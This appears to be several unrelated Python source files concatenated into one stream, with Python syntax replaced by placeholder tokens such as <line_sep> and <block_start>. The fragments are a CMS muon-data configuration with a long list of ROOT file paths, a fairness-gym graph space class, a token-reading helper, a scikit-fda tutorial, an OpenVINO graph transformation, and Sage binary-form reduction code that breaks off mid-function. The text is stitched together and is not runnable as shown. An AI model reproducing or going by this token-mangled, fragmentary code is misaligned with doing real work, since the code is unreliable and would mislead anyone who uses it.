"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B64FD56E-6E87-E611-BD9C-02163E016438.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B4BC5C81-6987-E611-B97A-F04DA275C2FB.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B43870D6-1A88-E611-A7C0-0026B9F8CC18.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/AE723C49-B287-E611-ACE5-0CC47A78A42E.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/AC213957-658B-E611-A7AF-0025905B8612.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/AA51B3CF-4B89-E611-A41A-02163E013C40.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A8FF1F89-E586-E611-BC37-FA163E08C002.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A28F9FFD-B489-E611-B864-008CFAFBF132.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A21B22EA-8888-E611-B0C4-0CC47A4DEEBA.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A0C3ADD4-0E87-E611-892F-02163E014D8C.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9EE91F3C-1B87-E611-878C-FA163E775232.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9CAF60BB-4489-E611-A29C-FA163EEF018D.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9AAB70FE-D587-E611-834C-FA163ECD5C62.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9A522CDD-6287-E611-BA23-FA163E3DAA96.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9A345235-E586-E611-9CE6-FA163EFA00C3.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/98CD93AB-3A88-E611-A4C8-B083FED04276.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/961767D1-B189-E611-A1A3-20CF305B05AE.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/90AAF1A6-5387-E611-B9B8-0025905C3DF6.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/90522755-9587-E611-A29C-C45444922BB0.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/901352B9-B189-E611-89EC-0CC47A6C183A.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/8E949801-8288-E611-B9D6-047D7BD6DF22.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/88ADAECF-5789-E611-81B2-FA163EDB91EF.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/8823F019-8587-E611-A162-00259073E3EA.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/80CD4397-2A88-E611-9639-20474791CCC4.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/8095FC8B-B389-E611-ADD9-7CD30AB7F868.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/767A38E6-6287-E611-B225-02163E015D84.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/744FC7C0-5387-E611-BA6F-FA163E06DFEA.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/6CFB58E7-1587-E611-BD35-FA163EC97E57.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/68DE47B4-7E88-E611-A6AE-001E67792422.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/68A0DCD5-BB87-E611-8BF3-008CFA0F5040.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/68171F81-6187-E611-A9DF-001E67504F1D.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/66421E3C-5489-E611-B0BE-001E67505A2D.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/64FB46E3-8887-E611-AAAA-FA163EFA220C.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/64CC5933-4088-E611-B8DD-0025904C641E.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/6448920B-7D87-E611-A5EA-02163E017614.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/6297FABA-5789-E611-A918-0CC47AC08BF8.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/5C7F15A9-9A88-E611-A80B-FA163EC5FCBC.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/5A63963D-B887-E611-88DC-001E6739C801.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/5404AF86-6187-E611-8DB3-44A84225CDA4.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/509458EF-B189-E611-9F85-FA163E17EB18.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/4C3B6518-B189-E611-93B3-0025905A612A.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/48E6AB0F-F286-E611-9792-FA163EDB91EF.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/40E2E2DE-8887-E611-9531-FA163E2AAF83.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/38FF87C2-B189-E611-B665-0CC47A1DF7FA.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/38CE04DC-5788-E611-9240-848F69FD2853.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/32775AB1-6C87-E611-A388-02163E0165D4.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/30A4019E-FE86-E611-B70E-02163E0165B6.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/2C6B53B6-5387-E611-9582-FA163E75F411.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/26D33DC4-3889-E611-B1AF-FA163E743F0B.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/26181B1F-6387-E611-AC9E-02163E01304E.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/24A815DC-0E87-E611-8D96-B083FED13C9E.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/22256107-6887-E611-847F-002590DE6E86.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/20263DED-9B88-E611-9630-001E67F336E0.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/1EF43C44-DE87-E611-BB70-6C3BE5B5B340.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/128426B7-8988-E611-BB9C-008CFA0A5A10.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/1041B010-6F87-E611-BA26-02163E015FDB.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0E90E9AF-5387-E611-9FFA-FA163EC80D44.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0C894F1B-5289-E611-8381-0025904C5DE0.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0C6DFDD5-4D87-E611-9CF3-FA163E0B7F2E.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0C153439-B187-E611-96D9-002590E1E9B8.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/083DFA38-B189-E611-BD7C-A0369F7FC770.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/02A6971D-F286-E611-8364-002590DE6E32.root"))<line_sep>process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(-1))<line_sep>process.out=cms.OutputModule("PoolOutputModule" outputCommands=cms.untracked.vstring('drop *' 'keep *_muonDTDigis_*_*' 'keep *_dt4DSegments_*_*') fileName=cms.untracked.string('/store/user/carrillo/digis_segments_Run2016BSingleMuonRAW-RECO.root'))<line_sep>process.p=cms.Path(process.muonDTDigis<times>process.dtlocalreco)<line_sep>process.this_is_the_end=cms.EndPath(process.out)<line_sep>
<import_stmt>os<import_from_stmt>.world MujocoWorldBase<line_sep>assets_root=os.path.join(os.path.dirname(__file__) "assets")<line_sep>
# coding=utf-8 # Copyright 2020 The ML Fairness Gym Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python2, python3 """Graph spaces for the ML fairness gym."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_stmt>typing Any<import_stmt>gym<import_stmt>networkx<as>nx<class_stmt>GraphSpace(gym.Space)<block_start>"""The space of random NetworkX graphs with a given number of nodes. Graphs sampled from this space are drawn from the Erdos-Renyi random graph model where each pair of nodes shares an edge with probability p. Graphs can be directed or undirected. Two graph spaces are considered equivalent if they have the same number of nodes, the same edge probability, and the same directedness. """<def_stmt>__init__ self num_nodes directed=<false> p=0.05<block_start>"""Initialize a GraphSpace instance. Args: num_nodes: A positive integer indicating the number of nodes of graphs that are contained in this space. directed: A boolean indicating whether this space contains directed or undirected graphs. p: A float in [0, 1] that gives the probability that any two nodes are connected by an edge in graphs that are sampled from this space. """<line_sep>self.num_nodes=num_nodes<line_sep>self.directed=directed<line_sep>self.p=p<block_end><def_stmt>contains self item<block_start><return>(isinstance(item nx.Graph)<and>item.number_of_nodes()<eq>self.num_nodes)<block_end><def_stmt>sample self<block_start><return>nx.fast_gnp_random_graph(self.num_nodes self.p directed=self.directed)<block_end><def_stmt>__repr__ self<block_start><return>'Graph (%d, %.4f, %s)'%(self.num_nodes self.p self.directed)<block_end><def_stmt>__eq__ self other<block_start><return>(isinstance(other self.__class__)<and>self.num_nodes<eq>other.num_nodes<and>self.p<eq>other.p<and>self.directed<eq>other.directed)<block_end><block_end>
<def_stmt>user_token <block_start><import_from_stmt>foundations_contrib.utils foundations_home<import_from_stmt>os.path expanduser join<import_stmt>yaml<import_stmt>os<line_sep>token=os.getenv('FOUNDATIONS_TOKEN' <none>)<if_stmt><not>token<block_start>credential_filepath=expanduser(join(foundations_home() "credentials.yaml"))<if_stmt><not>os.path.isfile(credential_filepath)<block_start><return><none><block_end><with_stmt>open(credential_filepath "r")<as>file<block_start>credential_dict=yaml.load(file Loader=yaml.FullLoader)<block_end><if_stmt>"default"<not><in>credential_dict<block_start><return><none><block_end><if_stmt>"token"<not><in>credential_dict["default"]<block_start><return><none><block_end>token=credential_dict["default"]["token"]<block_end><return>token<block_end>
""" Representation of functional data ================================= Explores the different representations of functional data. """<line_sep># Author: <NAME> # License: MIT <import_stmt>skfda<import_from_stmt>skfda.representation.interpolation SplineInterpolation<import_stmt>skfda.representation.basis<as>basis<line_sep>############################################################################## # In this example we are going to show the different representations of # functional data available in scikit-fda. # # First we are going to fetch a functional data dataset, such as the Berkeley # Growth Study. This dataset correspond to the height of several boys and # girls measured until the 18 years of age. The number and times of the # measurements are the same for each individual. dataset=skfda.datasets.fetch_growth()<line_sep>fd=dataset['data']<line_sep>y=dataset['target']<line_sep>print(repr(fd))<line_sep>fd.plot(group=y group_colors=['red' 'blue'])<line_sep>############################################################################## # This kind of representation is a discretized representation, in which the # measurement points are shared between samples. print(fd.grid_points)<line_sep>############################################################################## # In this representation, the data can be arranged as a matrix. print(fd.data_matrix)<line_sep>############################################################################## # By default, the data points are interpolated using a linear interpolation, # but this is configurable. dataset=skfda.datasets.fetch_medflies()<line_sep>fd=dataset['data']<line_sep>first_curve=fd[0]<line_sep>first_curve.plot()<line_sep>############################################################################## # The interpolation used can however be changed. Here, we will use an # interpolation with degree 3 splines. first_curve.interpolation=SplineInterpolation(3)<line_sep>first_curve.plot()<line_sep>############################################################################## # This representation allows also functions with arbitrary dimensions of the # domain and codomain. fd=skfda.datasets.make_multimodal_samples(n_samples=1 dim_domain=2 dim_codomain=2)<line_sep>print(fd.dim_domain)<line_sep>print(fd.dim_codomain)<line_sep>fd.plot()<line_sep>############################################################################## # Another possible representation is a decomposition in a basis of functions. # $$ # f(t) = \\sum_{i=1}^N a_i \\phi_i(t) # $$ # It is possible to transform between both representations. Let us use again # the Berkeley Growth dataset. dataset=skfda.datasets.fetch_growth()<line_sep>fd=dataset['data']<line_sep>y=dataset['target']<line_sep>fd.plot()<line_sep>############################################################################## # We will represent it using a basis of B-splines. fd_basis=fd.to_basis(basis.BSpline(n_basis=4))<line_sep>fd_basis.plot()<line_sep>############################################################################## # We can increase the number of elements in the basis to try to reproduce the # original data with more fidelity. fd_basis_big=fd.to_basis(basis.BSpline(n_basis=7))<line_sep>fd_basis_big.plot()<line_sep>############################################################################# # Lets compare the diferent representations in the same plot, for the same # curve fig=fd[0].plot()<line_sep>fd_basis[0].plot(fig=fig)<line_sep>fd_basis_big[0].plot(fig=fig)<line_sep>fig.axes[0].legend(['Original' '4 elements' '7 elements'])<line_sep>############################################################################## # We can also see the effect of changing the basis. # For example, in the Fourier basis the functions start and end at the same # points if the period is equal to the domain range, so this basis is clearly # non suitable for the Growth dataset. fd_basis=fd.to_basis(basis.Fourier(n_basis=7))<line_sep>fd_basis.plot()<line_sep>############################################################################## # The data is now represented as the coefficients in the basis expansion. print(fd_basis)<line_sep>
# Copyright (C) 2018-2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 <import_stmt>logging<as>log<import_stmt>numpy<as>np<import_from_stmt>mo.front.common.replacement FrontReplacementPattern<import_from_stmt>mo.graph.graph Graph Node<class_stmt>ChangePlaceholderTypes(FrontReplacementPattern)<block_start>enabled=<true><line_sep>run_not_recursively=<true><line_sep>@staticmethod<def_stmt>is_node_casts_to_float_or_shapeof node:Node<block_start><return>(node.soft_get('type')<eq>'Convert'<and>node.soft_get('dst_type')<eq>np.float32)<or>node.soft_get('type')<eq>'ShapeOf'<block_end><def_stmt>find_and_replace_pattern self graph:Graph<block_start><for_stmt>op graph.get_op_nodes(type='Parameter')<block_start>consumer_nodes=[p.node<for>p op.out_port(0).get_destinations()]<if_stmt>all([ChangePlaceholderTypes.is_node_casts_to_float_or_shapeof(consumer)<for>consumer consumer_nodes])<block_start>log.debug('Convert data type of Parameter "{}" to float32'.format(op.soft_get('name' op.id)))<line_sep>op.data_type=np.float32<for_stmt>convert_node consumer_nodes<block_start><if_stmt>convert_node.soft_get('type')<eq>'Convert'<block_start>log.debug('Removing "Convert" node "{}"'.format(convert_node.soft_get('name' convert_node.id)))<line_sep># disconnect consumer ports of Convert operations. Then connect them with an output of Parameter convert_destinations=convert_node.out_port(0).get_destinations()<for_stmt>dst_port convert_destinations<block_start>dst_port.disconnect()<block_end><for_stmt>dst_port convert_destinations<block_start>op.out_port(0).connect(dst_port)<block_end>graph.remove_node(convert_node.id)<block_end><block_end><block_end><if_stmt>op.soft_get('data_type')<eq>np.int64<block_start>op.data_type=np.int32<line_sep>log.error('Convert data type of Parameter "{}" to int32'.format(op.soft_get('name' op.id)) extra={'is_warning':<true>})<block_end><if_stmt>op.soft_get('data_type')<eq>np.uint8<block_start>op.data_type=np.float32<line_sep>log.debug('Convert data type of Parameter "{}" to float'.format(op.soft_get('name' op.id)))<block_end><block_end><block_end><block_end>
# -*- coding: utf-8 -*- r""" Helper functions for reduction of binary forms. The algorithm for reducing is from Stoll and Cremona's "On the Reduction Theory of Binary Forms" [CS2003]_. This takes a two variable homogeneous polynomial and finds a reduced form. This is an `SL(2,\ZZ)`-equivalent binary form whose covariant in the upper half plane is in the fundamental domain. Further, the algorithm from Hutz and Stoll [HS2018]_ allows the form to be further minimized so that the coefficients have either smallest height or smallest `L_2` norm. AUTHORS: - <NAME> -- initial version of reduction as part of GSOC 2016 - <NAME> (2018-7) -- improvements to reduce and implement smallest coefficient model """<line_sep># **************************************************************************** # Copyright (C) 2018 <NAME> <<EMAIL>> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. # https://www.gnu.org/licenses/ # **************************************************************************** <import_from_stmt>sage.calculus.functions jacobian<import_from_stmt>sage.functions.hyperbolic cosh sinh<import_from_stmt>sage.functions.log exp<import_from_stmt>sage.matrix.constructor matrix<import_from_stmt>sage.misc.misc_c prod<import_from_stmt>sage.modules.free_module_element vector<import_from_stmt>sage.rings.cc CC<import_from_stmt>sage.rings.complex_mpfr ComplexField<import_from_stmt>sage.rings.complex_interval_field ComplexIntervalField<import_from_stmt>sage.rings.integer_ring ZZ<import_from_stmt>sage.rings.laurent_series_ring LaurentSeriesRing<import_from_stmt>sage.rings.polynomial.polynomial_ring_constructor PolynomialRing<import_from_stmt>sage.rings.rational_field QQ<import_from_stmt>sage.rings.real_mpfr RealField<def_stmt>covariant_z0 F z0_cov=<false> prec=53 emb=<none> error_limit=0.000001<block_start>r""" Return the covariant and Julia invariant from Cremona-Stoll [CS2003]_. In [CS2003]_ and [HS2018]_ the Julia invariant is denoted as `\Theta(F)` or `R(F, z(F))`. Note that you may get faster convergence if you first move `z_0(F)` to the fundamental domain before computing the true covariant INPUT: - ``F`` -- binary form of degree at least 3 with no multiple roots - ``z0_cov`` -- boolean, compute only the `z_0` invariant. Otherwise, solve the minimization problem - ``prec``-- positive integer. precision to use in CC - ``emb`` -- embedding into CC - ``error_limit`` -- sets the error tolerance (default:0.000001) OUTPUT: a complex number, a real number EXAMPLES:: sage: from sage.rings.polynomial.binary_form_reduce import covariant_z0 sage: R.<x,y> = QQ[] sage: F = 19*x^8 - 262*x^7*y + 1507*x^6*y^2 - 4784*x^5*y^3 + 9202*x^4*y^4\ ....: - 10962*x^3*y^5 + 7844*x^2*y^6 - 3040*x*y^7 + 475*y^8 sage: covariant_z0(F, prec=80, z0_cov=True) (1.3832330115323681438175 + 0.31233552177413614978744*I, 3358.4074848663492819259) sage: F = -x^8 + 6*x^7*y - 7*x^6*y^2 - 12*x^5*y^3 + 27*x^4*y^4\ ....: - 4*x^3*y^5 - 19*x^2*y^6 + 10*x*y^7 - 5*y^8 sage: covariant_z0(F, prec=80) (0.64189877107807122203366 + 1.1852516565091601348355*I, 3134.5148284344627168276) :: sage: R.<x,y> = QQ[] sage: covariant_z0(x^3 + 2*x^2*y - 3*x*y^2, z0_cov=True)[0] 0.230769230769231 + 0.799408065031789*I sage: -1/covariant_z0(-y^3 + 2*y^2*x + 3*y*x^2, z0_cov=True)[0] 0.230769230769231 + 0.799408065031789*I :: sage: R.<x,y> = QQ[] sage: covariant_z0(2*x^2*y - 3*x*y^2, z0_cov=True)[0] 0.750000000000000 + 1.29903810567666*I sage: -1/covariant_z0(-x^3 - x^2*y + 2*x*y^2, z0_cov=True)[0] + 1 0.750000000000000 + 1.29903810567666*I :: sage: R.<x,y> = QQ[] sage: covariant_z0(x^2*y - x*y^2, prec=100) # tol 1e-28 (0.50000000000000000000000000003 + 0.86602540378443864676372317076*I, 1.5396007178390020386910634147) TESTS:: sage: R.<x,y>=QQ[] sage: covariant_z0(x^2 + 24*x*y + y^2) Traceback (most recent call last): ... ValueError: must be at least degree 3 sage: covariant_z0((x+y)^3, z0_cov=True) Traceback (most recent call last): ... ValueError: cannot have multiple roots for z0 invariant sage: covariant_z0(x^3 + 3*x*y + y) Traceback (most recent call last): ... TypeError: must be a binary form sage: covariant_z0(-2*x^2*y^3 + 3*x*y^4 + 127*y^5) Traceback (most recent call last): ... ValueError: cannot have a root with multiplicity >= 5/2 sage: covariant_z0((x^2+2*y^2)^2) Traceback (most recent call last): ... ValueError: must have at least 3 distinct roots """<line_sep>R=F.parent()<line_sep>d=ZZ(F.degree())<if_stmt>R.ngens()<ne>2<or>any(sum(t)<ne>d<for>t F.exponents())<block_start><raise>TypeError('must be a binary form')<block_end><if_stmt>d<l>3<block_start><raise>ValueError('must be at least degree 3')<block_end>f=F.subs({R.gen(1):1}).univariate_polynomial()<if_stmt>f.degree()<l>d# we have a root at infinity <block_start><if_stmt>f.constant_coefficient()<ne>0# invert so we find all roots! <block_start>mat=matrix(ZZ 2 2 [0 -1 1 0])<block_end><else_stmt><block_start>t=0<while_stmt>f(t)<eq>0<block_start>t<augadd>1<block_end>mat=matrix(ZZ 2 2 [t -1 1 0])<block_end><block_end><else_stmt><block_start>mat=matrix(ZZ 2 2 [1 0 0 1])<block_end>f=F(list(mat<times>vector(R.gens()))).subs({R.gen(1):1}).univariate_polynomial()<line_sep># now we have a single variable polynomial with all the roots of F K=ComplexField(prec=prec)<if_stmt>f.base_ring()<ne>K<block_start><if_stmt>emb<is><none><block_start>f=f.change_ring(K)<block_end><else_stmt><block_start>f=f.change_ring(emb)<block_end><block_end>roots=f.roots()<if_stmt>max(ex<for>_,ex roots)<g>1<or>f.degree()<l>d-1<block_start><if_stmt>z0_cov<block_start><raise>ValueError('cannot have multiple roots for z0 invariant')<block_end><else_stmt># just need a starting point for Newton's method <block_start>f=f.lc()<times>prod(p<for>p,ex f.factor())# removes multiple roots <if_stmt>f.degree()<l>3<block_start><raise>ValueError('must have at least 3 distinct roots')<block_end>roots=f.roots()<block_end><block_end>roots=[p<for>p,_ roots]<line_sep># finding quadratic Q_0, gives us our covariant, z_0 dF=f.derivative()<line_sep>n=ZZ(f.degree())<line_sep>PR=PolynomialRing(K 'x,y')<line_sep>x,y=PR.gens()<line_sep># finds Stoll and Cremona's Q_0 q=sum([(1/(dF(r).abs()<power>(2/(n-2))))<times>((x-(r<times>y))<times>(x-(r.conjugate()<times>y)))<for>r roots])<line_sep># this is Q_0 , always positive def as long as F has distinct roots A=q.monomial_coefficient(x<power>2)<line_sep>B=q.monomial_coefficient(x<times>y)<line_sep>C=q.monomial_coefficient(y<power>2)<line_sep># need positive root <try_stmt><block_start>z=((-B+((B<power>2)-(4<times>A<times>C)).sqrt())/(2<times>A))<block_end><except_stmt>ValueError<block_start><raise>ValueError("not enough precision")<block_end><if_stmt>z.imag()<l>0<block_start>z=(-B-((B<power>2)-(4<times>A<times>C)).sqrt())/(2<times>A)<block_end><if_stmt>z0_cov<block_start>FM=f# for Julia's invariant <block_end><else_stmt># solve the minimization problem for 'true' covariant <block_start>CF=ComplexIntervalField(prec=prec)# keeps trac of our precision error z=CF(z)<line_sep>FM=F(list(mat<times>vector(R.gens()))).subs({R.gen(1):1}).univariate_polynomial()<import_from_stmt>sage.rings.polynomial.complex_roots complex_roots<line_sep>L1=complex_roots(FM min_prec=prec)<line_sep>L=[]<line_sep># making sure multiplicity isn't too large using convergence conditions in paper <for_stmt>p,e L1<block_start><if_stmt>e<ge>d/2<block_start><raise>ValueError('cannot have a root with multiplicity >= %s/2'%d)<block_end><for_stmt>_ range(e)<block_start>L.append(p)<block_end><block_end>RCF=PolynomialRing(CF 'u,t')<line_sep>a=RCF.zero()<line_sep>c=RCF.zero()<line_sep>u,t=RCF.gens()<for_stmt>l L<block_start>denom=((t-l)<times>(t-l.conjugate())+u<power>2)<line_sep>a<augadd>u<power>2/denom<line_sep>c<augadd>(t-l.real())/denom<block_end># Newton's Method, to find solutions. Error bound is less than diameter of our z err=z.diameter()<line_sep>zz=z.diameter()<line_sep>g1=a.numerator()-d/2<times>a.denominator()<line_sep>g2=c.numerator()<line_sep>G=vector([g1 g2])<line_sep>J=jacobian(G [u t])<line_sep>v0=vector([z.imag() z.real()])# z0 as starting point # finds our correct z <while_stmt>err<le>zz<block_start>NJ=J.subs({u:v0[0] t:v0[1]})<line_sep>NJinv=NJ.inverse()<line_sep># inverse for CIF matrix seems to return fractions not CIF elements, fix them <if_stmt>NJinv.base_ring()<ne>CF<block_start>NJinv=matrix(CF 2 2 [CF(zw.numerator()/zw.denominator())<for>zw NJinv.list()])<block_end>w=z<line_sep>v0=v0-NJinv<times>G.subs({u:v0[0] t:v0[1]})<line_sep>z=v0[1].constant_coefficient()+v0[0].constant_coefficient()<times>CF.gen(0)<line_sep>err=z.diameter()# precision zz=(w-z).abs().lower()# difference in w and z <block_end><else_stmt># despite there is no break, this happens <block_start><if_stmt>err<g>error_limit<or>err.is_NaN()<block_start><raise>ValueError("accuracy of Newton's root not within tolerance(%s > %s), increase precision"%(err error_limit))<block_end><block_end><if_stmt>z.imag().upper()<le>z.diameter()<block_start><raise>ArithmeticError("Newton's method converged to z not in the upper half plane")<block_end>z=z.center()<block_end># Julia's invariant <if_stmt>FM.base_ring()<ne>ComplexField(prec=prec)<block_start>FM=FM.change_ring(ComplexField(prec=prec))<block_end>tF=z.real()<line_sep>uF=z.imag()<line_sep>th=FM.lc().abs()<power>2<for_stmt>r,ex FM.roots()<block_start><for_stmt>_ range(ex)<block_start>th=th<times>((((r-tF).abs())<power>2+uF<power>2)/uF)<block_end><block_end># undo shift and invert (if needed) # since F \cdot m ~ m^(-1)\cdot z # we apply m to z to undo m acting on F l=mat<times>vector([z 1])<line_sep><return>l[0]/l[1] th<block_end># // compute inverse of eps_F # from <NAME> <def_stmt>epsinv F target prec=53 target_tol=0.001 z=<none> emb=<none><block_start>""" Compute a bound on the hyperbolic distance. The true minimum will be within the computed bound. It is computed as the inverse of epsilon_F from [HS2018]_. INPUT: - ``F`` -- binary form of degree at least 3 with no multiple roots - ``target`` -- positive real number. The value we want to attain, i.e., the value we are taking the inverse of - ``prec``-- positive integer. precision to use in CC - ``target_tol`` -- positive real number. The tolerance with which we attain the target value. - ``z`` -- complex number. ``z_0`` covariant for F. - ``emb`` -- embedding into CC OUTPUT: a real number delta satisfying target + target_tol > eps_F(delta) > target. EXAMPLES:: sage: from sage.rings.polynomial.binary_form_reduce import epsinv sage: R.<x,y> = QQ[] sage: epsinv(-2*x^3 + 2*x^2*y + 3*x*y^2 + 127*y^3, 31.5022020249597) # tol 1e-12 4.02520895942207 """<def_stmt>RQ delta# this is the quotient R(F_0,z)/R(F_0,z(F)) for a generic z # at distance delta from j. See Lemma 4.2 in [HS2018]. <block_start>cd=cosh(delta).n(prec=prec)<line_sep>sd=sinh(delta).n(prec=prec)<line_sep><return>prod([cd+(cost<times>phi[0]+sint<times>phi[1])<times>sd<for>phi phis])<block_end><def_stmt>epsF delta<block_start>pol=RQ(delta)# get R quotient in terms of z S=PolynomialRing(C 'v')<line_sep>g=S([(i-d)<times>pol[i-d]<for>i range(2<times>d+1)])# take derivative drts=[e<for>e g.roots(ring=C multiplicities=<false>)<if>(e.norm()-1).abs()<l>0.1]<line_sep># find min <return>min([pol(r/r.abs()).real()<for>r drts])<block_end>C=ComplexField(prec=prec)<line_sep>R=F.parent()<line_sep>d=F.degree()<if_stmt>z<is><none><block_start>z,th=covariant_z0(F prec=prec emb=emb)<block_end><else_stmt># need to do our own input checking <block_start><if_stmt>R.ngens()<ne>2<or>any(sum(t)<ne>d<for>t F.exponents())<block_start><raise>TypeError('must be a binary form')<block_end><if_stmt>d<l>3<block_start><raise>ValueError('must be at least degree 3')<block_end><block_end>f=F.subs({R.gen(1):1}).univariate_polynomial()<line_sep># now we have a single variable polynomial <if_stmt>(max(ex<for>p,ex f.roots(ring=C))<ge>QQ(d)/2<or>f.degree()<l>QQ(d)/2)<block_start><raise>ValueError('cannot have root with multiplicity >= deg(F)/2')<block_end>R=RealField(prec=prec)<line_sep>PR=PolynomialRing(R 't')<line_sep>t=PR.gen(0)<line_sep># compute phi_1, ..., phi_k # first find F_0 and its roots # this change of variables on f moves z(f) to j, i.e. produces F_0 rts=f(z.imag()<times>t+z.real()).roots(ring=C)<line_sep>phis=[]# stereographic projection of roots <for_stmt>r,e rts<block_start>phis.extend([[2<times>r.real()/(r.norm()+1) (r.norm()-1)/(r.norm()+1)]])<block_end><if_stmt>d<ne>f.degree()# include roots at infinity <block_start>phis.extend([(d-f.degree())<times>[0 1]])<block_end># for writing RQ in terms of generic z to minimize LC=LaurentSeriesRing(C 'u' default_prec=2<times>d+2)<line_sep>u=LC.gen(0)<line_sep>cost=(u+u<power>(-1))/2<line_sep>sint=(u-u<power>(-1))/(2<times>C.gen(0))<line_sep># first find an interval containing the desired value # then use regula falsi on log eps_F # d -> delta value in interval [0,1] # v in value in interval [1,epsF(1)] dl=R(0.0)<line_sep>vl=R(1.0)<line_sep>du=R(1.0)<line_sep>vu=epsF(du)<while_stmt>vu<l>target# compute the next value of epsF for delta = 2*delta 